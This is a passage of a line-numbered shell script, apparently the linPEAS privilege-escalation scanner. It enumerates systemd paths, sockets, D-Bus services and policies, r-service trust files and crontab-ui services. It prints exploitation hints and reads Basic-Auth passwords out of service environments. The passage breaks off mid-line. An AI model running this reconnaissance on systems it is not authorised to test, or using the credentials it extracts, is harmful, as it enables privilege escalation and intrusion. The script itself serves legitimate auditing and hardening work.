"Systemd PATH" "T1543.002" 7275 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths" 7276 if check_systemctl; then 7277 systemctl show-environment 2>/dev/null | 7278 grep "PATH" | 7279 while read -r path_line; do 7280 echo "$path_line" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" 7281 # Store writable paths for later use 7282 if echo "$path_line" | grep -qE "$Wfolders"; then 7283 WRITABLESYSTEMDPATH="$path_line" 7284 fi 7285 done 7286 fi 7287 echo "" 7288 fi 7289 7290 fi 7291 7292 if check_mitre_filter "T1559"; then 7293 if ! [ "$IAMROOT" ]; then 7294 print_2title "Analyzing .socket files" "T1559" 7295 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets" 7296 # Function to check if path is relative 7297 is_relative_path() { 7298 local lpath="$1" 7299 case "$lpath" in 7300 /*) return 1 ;; # Absolute path 7301 *) return 0 ;; # Relative path 7302 esac 7303 } 7304 # Function to check socket file content 7305 check_socket_file() { 7306 local socket_file="$1" 7307 local findings="" 7308 # Check if socket file is writable (following symlinks) 7309 if [ -L "$socket_file" ]; then 7310 # If it's a symlink, check the target file 7311 local target_file=$(readlink -f "$socket_file") 7312 if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then 7313 findings="${findings}WRITABLE_FILE: Socket target file is writable: $target_file\n" 7314 fi 7315 elif ! [ "$IAMROOT" ] && [ -w "$socket_file" ] && [ -f "$socket_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then 7316 findings="${findings}WRITABLE_FILE: Socket file is writable\n" 7317 fi 7318 # Check for weak permissions (following symlinks) 7319 if [ "$(stat -L -c %a "$socket_file" 2>/dev/null)" = "777" ]; then 7320 findings="${findings}WEAK_PERMS: Socket file has 777 permissions\n" 7321 fi 7322 # Check for executables (following symlinks) 7323 local exec_paths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') 7324 printf "%s\n" "$exec_paths" | while read -r exec_path; do 7325 if [ -n "$exec_path" ]; then 7326 # Check if executable is writable (following symlinks) 7327 if [ -L "$exec_path" ]; then 7328 local target_exec=$(readlink -f "$exec_path") 7329 if [ -w "$target_exec" ]; then 7330 findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n" 7331 fi 7332 # Check for weak permissions on target 7333 if [ -e "$target_exec" ] && [ "$(stat -L -c %a "$target_exec" 2>/dev/null)" = "777" ]; then 7334 findings="${findings}WEAK_EXEC_PERMS: Executable target has 777 permissions: $target_exec\n" 7335 fi 7336 else 7337 if [ -w "$exec_path" ]; then 7338 findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n" 7339 fi 7340 # Check for weak permissions 7341 if [ -e "$exec_path" ] && [ "$(stat -L -c %a "$exec_path" 2>/dev/null)" = "777" ]; then 7342 findings="${findings}WEAK_EXEC_PERMS: Executable has 777 permissions: $exec_path\n" 7343 fi 7344 fi 7345 # Check for relative paths 7346 if is_relative_path "$exec_path"; then 7347 findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" 7348 fi 7349 fi 7350 done 7351 # Check for listeners (following symlinks) 7352 local listen_paths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') 7353 printf "%s\n" "$listen_paths" | while read -r listen_path; do 7354 if [ -n "$listen_path" ]; then 7355 # Check if listener path is writable (following symlinks) 7356 if [ -L "$listen_path" ]; then 7357 local target_listen=$(readlink -f "$listen_path") 7358 if [ -w "$target_listen" ]; then 7359 findings="${findings}WRITABLE_LISTENER: Listener target path is writable: $target_listen\n" 7360 fi 7361 # Check for weak permissions on target 7362 if [ -e "$target_listen" ] && [ "$(stat -L -c %a "$target_listen" 2>/dev/null)" = "777" ]; then 7363 findings="${findings}WEAK_LISTENER_PERMS: Listener target path has 777 permissions: $target_listen\n" 7364 fi 7365 else 7366 if [ -w "$listen_path" ]; then 7367 findings="${findings}WRITABLE_LISTENER: Listener path is writable: $listen_path\n" 7368 fi 7369 # Check for weak permissions 7370 if [ -e "$listen_path" ] && [ "$(stat -L -c %a "$listen_path" 2>/dev/null)" = "777" ]; then 7371 findings="${findings}WEAK_LISTENER_PERMS: Listener path has 777 permissions: $listen_path\n" 7372 fi 7373 fi 7374 # Check for relative paths 7375 if is_relative_path "$listen_path"; then 7376 findings="${findings}RELATIVE_LISTENER: Uses relative path: $listen_path\n" 7377 fi 7378 fi 7379 done 7380 # Check for unsafe configurations 7381 if grep -qE '^(User|Group)=root' "$socket_file" 2>/dev/null; then 7382 findings="${findings}ROOT_USER: Socket runs as root\n" 7383 fi 7384 if grep -qE '^(CapabilityBoundingSet).*CAP_SYS_ADMIN' "$socket_file" 2>/dev/null; then 7385 findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n" 7386 fi 7387 if grep -qE '^(BindIP|BindIPv6Only)=yes' "$socket_file" 2>/dev/null; then 7388 findings="${findings}NETWORK_BIND: Can bind to network interfaces\n" 7389 fi 7390 # If any findings, print them 7391 if [ -n "$findings" ]; then 7392 echo "Potential privilege escalation in socket file: $socket_file" 7393 echo "$findings" | while read -r finding; do 7394 [ -n "$finding" ] && echo " └─ $finding" | sed -${E} "s,WRITABLE.*,${SED_RED},g" | sed -${E} "s,RELATIVE.*,${SED_RED_YELLOW},g" 7395 done 7396 fi 7397 } 7398 # Process each socket file 7399 if [ -n "$PSTORAGE_SOCKET" ]; then 7400 printf "%s\n" "$PSTORAGE_SOCKET" | while read -r socket_file; do 7401 if [ -n "$socket_file" ] && [ -e "$socket_file" ]; then 7402 check_socket_file "$socket_file" 7403 fi 7404 done 7405 else 7406 print_list "No socket files found" "$NC" 7407 fi 7408 echo "" 7409 fi 7410 7411 fi 7412 7413 if check_mitre_filter "T1571,T1049"; then 7414 if ! [ "$IAMROOT" ]; then 7415 if ! [ "$SEARCH_IN_FOLDER" ]; then 7416 print_2title "Unix Sockets Analysis" "T1571,T1049" 7417 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets" 7418 # Function to get socket permissions 7419 get_socket_perms() { 7420 local socket="$1" 7421 local perms="" 7422 # Check read permission 7423 if [ -r "$socket" ]; then 7424 perms="Read " 7425 fi 7426 # Check write permission 7427 if [ -w "$socket" ]; then 7428 perms="${perms}Write " 7429 fi 7430 # Check execute permission 7431 if [ -x "$socket" ]; then 7432 perms="${perms}Execute " 7433 fi 7434 # Check socket mode 7435 local mode=$(stat -c "%a" "$socket" 2>/dev/null) 7436 if [ "$mode" = "777" ] || [ "$mode" = "666" ]; then 7437 perms="${perms}(Weak Permissions: $mode) " 7438 fi 7439 echo "$perms" 7440 } 7441 # Function to check socket connectivity 7442 check_socket_connectivity() { 7443 local socket="$1" 7444 local perms="$2" 7445 if [ "$EXTRA_CHECKS" ] && command -v curl >/dev/null 2>&1; then 7446 # Try to connect to the socket 7447 if curl -v --unix-socket "$socket" --max-time 1 http:/linpeas 2>&1 | grep -iq "Permission denied"; then 7448 perms="${perms} - Cannot Connect" 7449 else 7450 perms="${perms} - Can Connect" 7451 fi 7452 fi 7453 echo "$perms" 7454 } 7455 # Function to analyze socket protocol 7456 analyze_socket_protocol() { 7457 local socket="$1" 7458 local owner="$2" 7459 local response="" 7460 # Try to get HTTP response 7461 if command -v curl >/dev/null 2>&1; then 7462 response=$(curl --max-time 2 --unix-socket "$socket" http:/index 2>/dev/null) 7463 if [ $? -eq 0 ]; then 7464 echo " └─ HTTP Socket (owned by $owner):" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" 7465 echo " └─ Response to /index (limit 30):" 7466 echo "$response" | head -n 30 | sed 's/^/ /' 7467 fi 7468 fi 7469 } 7470 # Function to get socket owner and group 7471 get_socket_owner() { 7472 local socket="$1" 7473 local owner="" 7474 local group="" 7475 if [ -e "$socket" ]; then 7476 owner=$(ls -l "$socket" 2>/dev/null | awk '{print $3}') 7477 group=$(ls -l "$socket" 2>/dev/null | awk '{print $4}') 7478 echo "$owner:$group" 7479 fi 7480 } 7481 # Collect listening sockets using multiple methods 7482 unix_scks_list="" 7483 for cmd in "ss -xlp -H state listening" "ss -l -p -A 'unix'" "netstat -a -p --unix"; do 7484 if [ -z "$unix_scks_list" ]; then 7485 unix_scks_list=$($cmd 2>/dev/null | grep -Eo "/[a-zA-Z0-9\._/\-]+" | grep -v " " | sort -u) 7486 fi 7487 done 7488 # Get additional socket information 7489 if [ -z "$unix_scks_list" ]; then 7490 unix_scks_list=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/" | sort -u) 7491 fi 7492 # Find socket files 7493 if ! [ "$SEARCH_IN_FOLDER" ]; then 7494 unix_scks_list2=$(find / -type s 2>/dev/null) 7495 else 7496 unix_scks_list2=$(find "$SEARCH_IN_FOLDER" -type s 2>/dev/null) 7497 fi 7498 # Process all found sockets 7499 (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort -u | while read -r socket; do 7500 if [ -n "$socket" ] && [ -e "$socket" ]; then 7501 # Get socket information 7502 perms=$(get_socket_perms "$socket") 7503 perms=$(check_socket_connectivity "$socket" "$perms") 7504 owner_info=$(get_socket_owner "$socket") 7505 # Print socket information 7506 if [ -z "$perms" ]; then 7507 echo "$socket" | sed -${E} "s,$socket,${SED_GREEN},g" 7508 else 7509 echo "$socket" | sed -${E} "s,$socket,${SED_RED},g" 7510 echo " └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g" 7511 # Analyze socket protocol if we can connect 7512 if echo "$perms" | grep -q "Can Connect"; then 7513 analyze_socket_protocol "$socket" "$owner_info" 7514 fi 7515 # Highlight dangerous ownership 7516 if echo "$owner_info" | grep -q "root"; then 7517 echo " └─(${RED}Owned by root${NC})" 7518 if echo "$perms" | grep -q "Write"; then 7519 echo " └─High risk: root-owned and writable Unix socket" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 7520 fi 7521 fi 7522 fi 7523 fi 7524 done 7525 fi 7526 echo "" 7527 fi 7528 7529 fi 7530 7531 if check_mitre_filter "T1559.001"; then 7532 if ! [ "$SEARCH_IN_FOLDER" ]; then 7533 print_2title "D-Bus Analysis" "T1559.001" 7534 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#d-bus" 7535 # Function to check for dangerous methods 7536 check_dangerous_methods() { 7537 service="$1" 7538 interface="$2" 7539 dangerous=0 7540 dangerous_methods="" 7541 # Common dangerous method patterns - using space-separated string instead of array 7542 patterns="StartUnit StopUnit RestartUnit EnableUnit DisableUnit SetProperty SetUser SetPassword CreateUser DeleteUser ModifyUser Execute Run Spawn Shell Command Exec Authenticate Login Logout Reboot Shutdown PowerOff Suspend Hibernate Update Install Uninstall Configure Modify Change Delete Remove Add Create Write Read Access Grant Revoke Allow Deny" 7543 # Get methods for the interface 7544 methods=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "method" | awk '{print $2}') 7545 # Check each method against dangerous patterns 7546 for method in $methods; do 7547 for pattern in $patterns; do 7548 if echo "$method" | grep -qi "$pattern"; then 7549 dangerous=1 7550 dangerous_methods="${dangerous_methods}${method} " 7551 fi 7552 done 7553 done 7554 if [ "$dangerous" -eq 1 ]; then 7555 echo " └─(${RED}Potentially dangerous methods found${NC})" 7556 echo " └─ $dangerous_methods" | sed 's/^/ /' 7557 fi 7558 return $dangerous 7559 } 7560 # Function to check for dangerous properties 7561 check_dangerous_properties() { 7562 service="$1" 7563 interface="$2" 7564 dangerous=0 7565 dangerous_props="" 7566 # Common dangerous property patterns - using space-separated string instead of array 7567 patterns="Executable Command Path User Group Permission Access Auth Password Secret Key Token Credential Config Setting Policy Rule Allow Deny Write Read Execute" 7568 # Get properties for the interface 7569 properties=$(busctl introspect "$service" "$interface" 2>/dev/null | grep "property" | awk '{print $2}') 7570 # Check each property against dangerous patterns 7571 for prop in $properties; do 7572 for pattern in $patterns; do 7573 if echo "$prop" | grep -qi "$pattern"; then 7574 dangerous=1 7575 dangerous_props="${dangerous_props}${prop} " 7576 fi 7577 done 7578 done 7579 if [ "$dangerous" -eq 1 ]; then 7580 echo " └─(${RED}Potentially dangerous properties found${NC})" 7581 echo " └─ $dangerous_props" | sed 's/^/ /' 7582 fi 7583 return $dangerous 7584 } 7585 # Function to analyze service object 7586 analyze_service_object() { 7587 dbusservice="$1" 7588 info="" 7589 dangerous=0 7590 # Get service status 7591 info=$(busctl status "$dbusservice" 2>/dev/null) 7592 # Check for root ownership 7593 if echo "$info" | grep -qE "^(UID|EUID|OwnerUID)=0"; then 7594 echo " └─(${RED}Running as root${NC})" 7595 dangerous=1 7596 fi 7597 # Get service interfaces 7598 interfaces=$(busctl tree "$dbusservice" 2>/dev/null) 7599 if [ -n "$interfaces" ]; then 7600 echo " └─ Interfaces:" 7601 echo "$interfaces" | sed 's/^/ /' 7602 # Check each interface for dangerous methods and properties 7603 echo "$interfaces" | while read -r interface; do 7604 if [ -n "$interface" ]; then 7605 if check_dangerous_methods "$dbusservice" "$interface"; then 7606 dangerous=1 7607 fi 7608 if check_dangerous_properties "$dbusservice" "$interface"; then 7609 dangerous=1 7610 fi 7611 fi 7612 done 7613 fi 7614 # Check for known dangerous services - using space-separated string instead of array 7615 dangerous_services="org.freedesktop.systemd1 org.freedesktop.PolicyKit1 org.freedesktop.Accounts org.freedesktop.login1 org.freedesktop.hostname1 org.freedesktop.timedate1 org.freedesktop.locale1 org.freedesktop.machine1 org.freedesktop.portable1 org.freedesktop.resolve1 org.freedesktop.timesync1 org.freedesktop.import1 org.freedesktop.export1 org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver" 7616 for dangerous_service in $dangerous_services; do 7617 if echo "$dbusservice" | grep -qi "$dangerous_service"; then 7618 echo " └─(${RED}Known dangerous service: $dangerous_service${NC})" 7619 dangerous=1 7620 fi 7621 done 7622 # If service is dangerous, provide exploitation hints 7623 if [ "$dangerous" -eq 1 ]; then 7624 echo " └─(${RED}Potential privilege escalation vector${NC})" 7625 echo " └─ Try: busctl call $dbusservice / [Interface] [Method] [Arguments]" 7626 echo " └─ Or: dbus-send --session --dest=$dbusservice / [Interface] [Method] [Arguments]" 7627 fi 7628 } 7629 # Function to analyze policy file 7630 analyze_policy_file() { 7631 file="$1" 7632 weak_policies=0 7633 # Check file permissions 7634 if ! [ "$IAMROOT" ] && [ -w "$file" ]; then 7635 echo " └─(${RED}Writable policy file${NC})" 7636 weak_policies=$((weak_policies + 1)) 7637 fi 7638 # Check general policy 7639 genpol=$(grep "<policy>" "$file" 2>/dev/null) 7640 if [ -n "$genpol" ]; then 7641 echo " └─(${RED}Weak general policy found${NC})" 7642 echo " └─ $genpol" | sed 's/^/ /' 7643 weak_policies=$((weak_policies + 1)) 7644 fi 7645 # Check user policies 7646 userpol=$(grep "<policy user=" "$file" 2>/dev/null | grep -v "root") 7647 if [ -n "$userpol" ]; then 7648 echo " └─(${RED}Weak user policy found${NC})" 7649 echo " └─ $userpol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" 7650 weak_policies=$((weak_policies + 1)) 7651 fi 7652 # Check group policies 7653 grppol=$(grep "<policy group=" "$file" 2>/dev/null | grep -v "root") 7654 if [ -n "$grppol" ]; then 7655 echo " └─(${RED}Weak group policy found${NC})" 7656 echo " └─ $grppol" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g" 7657 weak_policies=$((weak_policies + 1)) 7658 fi 7659 # Check for allow rules in default context 7660 allow_rules=$(grep -A 5 "context=\"default\"" "$file" 2>/dev/null | grep "allow") 7661 if [ -n "$allow_rules" ]; then 7662 echo " └─(${RED}Allow rules in default context${NC})" 7663 echo " └─ $allow_rules" | sed 's/^/ /' 7664 weak_policies=$((weak_policies + 1)) 7665 fi 7666 # Check for specific dangerous policy patterns - using space-separated string instead of array 7667 dangerous_patterns="allow_any allow_all allow_root allow_user allow_group allow_anonymous allow_any_user allow_any_group allow_any_uid allow_any_gid allow_any_pid allow_any_connection allow_any_method allow_any_property allow_any_signal allow_any_interface allow_any_path allow_any_destination allow_any_sender allow_any_receiver" 7668 for pattern in $dangerous_patterns; do 7669 if grep -qi "$pattern" "$file" 2>/dev/null; then 7670 echo " └─(${RED}Dangerous policy pattern found: $pattern${NC})" 7671 weak_policies=$((weak_policies + 1)) 7672 fi 7673 done 7674 return $weak_policies 7675 } 7676 # Analyze D-Bus Service Objects 7677 dbuslist=$(busctl list 2>/dev/null) 7678 if [ -n "$dbuslist" ]; then 7679 echo "$dbuslist" | while read -r dbus_service; do 7680 # Print service name with highlighting 7681 echo "$dbus_service" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," 7682 # Analyze service if it's not in the known list 7683 if ! echo "$dbus_service" | grep -qE "$dbuslistG"; then 7684 dbussrvc_object=$(echo "$dbus_service" | cut -d " " -f1) 7685 analyze_service_object "$dbussrvc_object" 7686 fi 7687 done 7688 else 7689 echo_not_found "busctl" 7690 fi 7691 # Analyze D-Bus Configuration Files 7692 if [ "$PSTORAGE_DBUS" ]; then 7693 echo "" 7694 print_2title "D-Bus Configuration Files" "T1559.001" 7695 echo "$PSTORAGE_DBUS" | while read -r dir; do 7696 [ -n "$dir" ] || continue 7697 if [ -f "$dir" ]; then 7698 echo "Analyzing $dir:" 7699 if analyze_policy_file "$dir"; then 7700 echo " └─(${RED}Multiple weak policies found${NC})" 7701 fi 7702 continue 7703 fi 7704 [ -d "$dir" ] || continue 7705 case "$dir" in 7706 */system-services|*/services) 7707 echo "Activation definitions in $dir:" 7708 grep -RInE '^(Name|Exec|User)=' "$dir" 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed "s,Exec=,${SED_RED}Exec=${NC},g" | sed "s,User=,${SED_RED}User=${NC},g" 7709 ;; 7710 *) 7711 for dbus_file in "$dir"/*; do 7712 if [ -f "$dbus_file" ]; then 7713 echo "Analyzing $dbus_file:" 7714 if analyze_policy_file "$dbus_file"; then 7715 echo " └─(${RED}Multiple weak policies found${NC})" 7716 fi 7717 fi 7718 done 7719 ;; 7720 esac 7721 done 7722 fi 7723 # Check for D-Bus session bus 7724 if command -v dbus-send >/dev/null 2>&1; then 7725 echo "" 7726 print_3title "D-Bus Session Bus Analysis" "T1559.001" 7727 if dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep -q "Error"; then 7728 echo "(${RED}No access to session bus${NC})" 7729 else 7730 echo "(${GREEN}Access to session bus available${NC})" 7731 # List available services on session bus 7732 session_services=$(dbus-send --session --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames 2>/dev/null | grep "string" | sed 's/^/ /') 7733 echo "$session_services" 7734 # Check for known dangerous session services - using space-separated string instead of array 7735 dangerous_session_services="org.gnome.SettingsDaemon org.gnome.Shell org.gnome.SessionManager org.gnome.DisplayManager org.gnome.ScreenSaver org.freedesktop.Notifications org.freedesktop.ScreenSaver org.freedesktop.PowerManagement org.freedesktop.UPower org.freedesktop.NetworkManager org.freedesktop.Avahi org.freedesktop.UDisks2 org.freedesktop.ModemManager1 org.freedesktop.PackageKit org.freedesktop.PolicyKit1 org.freedesktop.systemd1 org.freedesktop.Accounts org.freedesktop.login1" 7736 for dangerous_service in $dangerous_session_services; do 7737 if echo "$session_services" | grep -qi "$dangerous_service"; then 7738 echo " └─(${RED}Known dangerous session service: $dangerous_service${NC})" 7739 echo " └─ Try: dbus-send --session --dest=$dangerous_service / [Interface] [Method] [Arguments]" 7740 fi 7741 done 7742 fi 7743 fi 7744 fi 7745 echo "" 7746 7747 fi 7748 7749 if check_mitre_filter "T1021.004"; then 7750 if ! [ "$SEARCH_IN_FOLDER" ]; then 7751 print_2title "Legacy r-commands (rsh/rlogin/rexec) and host-based trust" "T1021.004" 7752 echo "" 7753 print_3title "Listening r-services (TCP 512-514)" "T1021.004" 7754 if command -v ss >/dev/null 2>&1; then 7755 ss -ltnp 2>/dev/null | awk '$1 ~ /^LISTEN$/ && $4 ~ /:(512|513|514)$/ {print}' || echo_not_found "ss" 7756 elif command -v netstat >/dev/null 2>&1; then 7757 netstat -ltnp 2>/dev/null | awk '$6 ~ /LISTEN/ && $4 ~ /:(512|513|514)$/ {print}' || echo_not_found "netstat" 7758 else 7759 echo_not_found "ss|netstat" 7760 fi 7761 echo "" 7762 print_3title "systemd units exposing r-services" "T1021.004" 7763 if command -v systemctl >/dev/null 2>&1; then 7764 systemctl list-unit-files 2>/dev/null | grep -E '^(rlogin|rsh|rexec)\.(socket|service)\b' || echo_not_found "rlogin|rsh|rexec units" 7765 systemctl list-sockets 2>/dev/null | grep -E '\b(rlogin|rsh|rexec)\.socket\b' || true 7766 else 7767 echo_not_found "systemctl" 7768 fi 7769 echo "" 7770 print_3title "inetd/xinetd configuration for r-services" "T1021.004" 7771 if [ -f /etc/inetd.conf ]; then 7772 grep -vE '^\s*#|^\s*$' /etc/inetd.conf 2>/dev/null | grep -Ei '\b(shell|login|exec|rsh|rlogin|rexec)\b' 2>/dev/null || echo " No r-services found in /etc/inetd.conf" 7773 else 7774 echo_not_found "/etc/inetd.conf" 7775 fi 7776 if [ -d /etc/xinetd.d ]; then 7777 # Print enabled r-services in xinetd 7778 for f in /etc/xinetd.d/*; do 7779 [ -f "$f" ] || continue 7780 if grep -qiE '\b(service|disable)\b' "$f" 2>/dev/null; then 7781 if grep -qiE 'service\s+(rsh|rlogin|rexec|shell|login|exec)\b' "$f" 2>/dev/null; then 7782 # Only warn if not disabled 7783 if ! grep -qiE '^\s*disable\s*=\s*yes\b' "$f" 2>/dev/null; then 7784 echo " $(basename "$f") may enable r-services:"; grep -iE '^(\s*service|\s*disable)' "$f" 2>/dev/null | sed 's/^/ /' 7785 fi 7786 fi 7787 fi 7788 done 7789 else 7790 echo_not_found "/etc/xinetd.d" 7791 fi 7792 echo "" 7793 print_3title "Installed r-service server packages" "T1021.004" 7794 if command -v dpkg >/dev/null 2>&1; then 7795 dpkg -l 2>/dev/null | grep -E '\b(rsh-server|rsh-redone-server|krb5-rsh-server|inetutils-inetd|openbsd-inetd|xinetd|netkit-rsh)\b' || echo " No related packages found via dpkg" 7796 elif command -v rpm >/dev/null 2>&1; then 7797 rpm -qa 2>/dev/null | grep -Ei '\b(rsh|rlogin|rexec|xinetd)\b' || echo " No related packages found via rpm" 7798 else 7799 echo_not_found "dpkg|rpm" 7800 fi 7801 echo "" 7802 print_3title "/etc/hosts.equiv and /etc/shosts.equiv" "T1021.004" 7803 for f in /etc/hosts.equiv /etc/shosts.equiv; do 7804 if [ -f "$f" ]; then 7805 perms=$(stat -c %a "$f" 2>/dev/null) 7806 owner=$(stat -c %U "$f" 2>/dev/null) 7807 echo " $f (perm $perms, owner $owner)" 7808 # Print non-comment lines 7809 awk 'NF && $0 !~ /^\s*#/ {print " " $0}' "$f" 2>/dev/null 7810 if grep -qEv '^\s*#|^\s*$' "$f" 2>/dev/null; then 7811 if grep -qE '(^|\s)\+' "$f" 2>/dev/null; then 7812 echo " [!] Wildcard '+' trust found" 7813 fi 7814 fi 7815 fi 7816 done 7817 echo "" 7818 print_3title "Per-user .rhosts files" "T1021.004" 7819 any_rhosts=false 7820 for rfile in /root/.rhosts /home/*/.rhosts; do 7821 if [ -f "$rfile" ]; then 7822 any_rhosts=true 7823 perms=$(stat -c %a "$rfile" 2>/dev/null) 7824 owner=$(stat -c %U "$rfile" 2>/dev/null) 7825 echo " $rfile (perm $perms, owner $owner)" 7826 awk 'NF && $0 !~ /^\s*#/ {print " " $0}' "$rfile" 2>/dev/null 7827 # Warn on insecure perms (group/other write) 7828 g=$(printf "%s" "$perms" | cut -c2) 7829 o=$(printf "%s" "$perms" | cut -c3) 7830 if [ "${g:-0}" -ge 2 ] || [ "${o:-0}" -ge 2 ]; then 7831 echo " [!] Insecure permissions (group/other write)" 7832 fi 7833 fi 7834 done 7835 if ! $any_rhosts; then echo_not_found ".rhosts"; fi 7836 echo "" 7837 print_3title "PAM rhosts authentication" "T1021.004" 7838 shown=false 7839 for p in /etc/pam.d/rlogin /etc/pam.d/rsh; do 7840 if [ -f "$p" ]; then 7841 shown=true 7842 echo " $p:" 7843 (grep -nEi 'pam_rhosts|pam_rhosts_auth' "$p" 2>/dev/null || echo " no pam_rhosts* lines") | sed 's/^/ /' 7844 fi 7845 done 7846 if ! $shown; then echo_not_found "/etc/pam.d/rlogin|rsh"; fi 7847 echo "" 7848 print_3title "SSH HostbasedAuthentication" "T1021.004" 7849 if [ -f /etc/ssh/sshd_config ]; then 7850 if grep -qiE '^[^#]*HostbasedAuthentication\s+yes' /etc/ssh/sshd_config 2>/dev/null; then 7851 echo " HostbasedAuthentication yes (check /etc/shosts.equiv or ~/.shosts)" 7852 else 7853 echo " HostbasedAuthentication no or not set" 7854 fi 7855 else 7856 echo_not_found "/etc/ssh/sshd_config" 7857 fi 7858 echo "" 7859 print_3title "Potential DNS control indicators (local)" "T1021.004" 7860 (ps -eo comm,args 2>/dev/null | grep -Ei '(^|/)(pdns|pdns_server|pdns_recursor|powerdns-admin)( |$)' | grep -Ev 'grep|bash' || echo " Not detected") 7861 echo "" 7862 fi 7863 7864 fi 7865 7866 if check_mitre_filter "T1053.003"; then 7867 if ! [ "$SEARCH_IN_FOLDER" ]; then 7868 print_2title "Crontab UI (root) misconfiguration checks" "T1053.003" 7869 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs" 7870 # Collect candidate services referencing crontab-ui 7871 candidates="" 7872 if command -v systemctl >/dev/null 2>&1; then 7873 candidates=$(systemctl list-units --type=service --all 2>/dev/null | awk '{print $1}' | grep -Ei '^crontab-ui\.service$' 2>/dev/null) 7874 fi 7875 # Fallback: grep service files for ExecStart containing crontab-ui 7876 if [ -z "$candidates" ]; then 7877 for dir in /etc/systemd/system /lib/systemd/system; do 7878 [ -d "$dir" ] || continue 7879 found=$(grep -RIl "^Exec(Start|StartPre|StartPost)=.*crontab-ui" "$dir" 2>/dev/null | xargs -r -I{} basename {} 2>/dev/null) 7880 if [ -n "$found" ]; then 7881 candidates=$(printf "%s\n%s" "$candidates" "$found" | sort -u) 7882 fi 7883 done 7884 fi 7885 # Also flag if the binary exists or a process seems to be running 7886 if command -v crontab-ui >/dev/null 2>&1; then 7887 print_list "crontab-ui binary found at: $(command -v crontab-ui)"$NC 7888 else 7889 echo_not_found "crontab-ui" 7890 fi 7891 procs=$(ps aux 2>/dev/null | grep -E "(crontab-ui|node .*crontab-ui)" | grep -v grep) 7892 if [ -n "$procs" ]; then 7893 print_list "Processes matching crontab-ui? ..................... "$NC 7894 printf "%s\n" "$procs" 7895 echo "" 7896 fi 7897 # If no candidates detected, exit quietly 7898 if [ "$candidates" ]; then 7899 # Iterate candidates and extract interesting data 7900 printf "%s\n" "$candidates" | while read -r svc; do 7901 [ -n "$svc" ] || continue 7902 # Ensure suffix .service if missing 7903 case "$svc" in 7904 *.service) : ;; 7905 *) svc="$svc.service" ;; 7906 esac 7907 state="" 7908 user="" 7909 if command -v systemctl >/dev/null 2>&1; then 7910 state=$(systemctl is-active "$svc" 2>/dev/null) 7911 user=$(systemctl show "$svc" -p User 2>/dev/null | cut -d= -f2) 7912 fi 7913 [ -z "$state" ] && state="unknown" 7914 [ -z "$user" ] && user="unknown" 7915 echo "Service: $svc (state: $state, User: $user)" | sed -${E} "s,root,${SED_RED},g" 7916 # Read Environment from systemd (works even if file unreadable in many setups) 7917 envvals=$(systemctl show "$svc" -p Environment 2>/dev/null | cut -d= -f2-) 7918 if [ -n "$envvals" ]; then 7919 basic_user=$(printf "%s\n" "$envvals" | tr ' ' '\n' | grep -E '^BASIC_AUTH_USER=' | head -n1 | cut -d= -f2-) 7920 basic_pwd=$(printf "%s\n" "$envvals" | tr ' ' '\n' | grep -E '^BASIC_AUTH_PWD=' | head -n1 | cut -d= -f2-) 7921 dbpath=$(printf "%s\n" "$envvals" | tr ' ' '\n' | grep -E '^CRON_DB_PATH=' | head -n1 | cut -d= -f2-) 7922 port=$(printf "%s\n" "$envvals" | tr ' ' '\n' | grep -E '^PORT=' | head -n1 | cut -d= -f2-) 7923 if [ -n "$basic_user" ] || [ -n "$basic_pwd" ]; then 7924 uprint="$basic_user" 7925 pprint="$basic_pwd" 7926 [ -n "$basic_pwd" ] && pprint="$basic_pwd" 7927 echo " └─ Basic-Auth credentials in Environment: user='${uprint}' 